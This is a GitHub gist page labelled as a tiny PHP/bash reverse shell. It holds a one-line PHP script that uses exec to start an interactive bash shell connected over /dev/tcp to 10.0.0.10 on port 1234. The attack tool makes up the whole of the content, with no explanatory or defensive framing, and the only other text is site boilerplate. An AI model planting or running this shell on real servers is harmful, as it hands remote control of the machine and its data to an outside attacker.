-
-
Save Rudis1261/d59156a8f93b47266c7549e8bf50196c to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment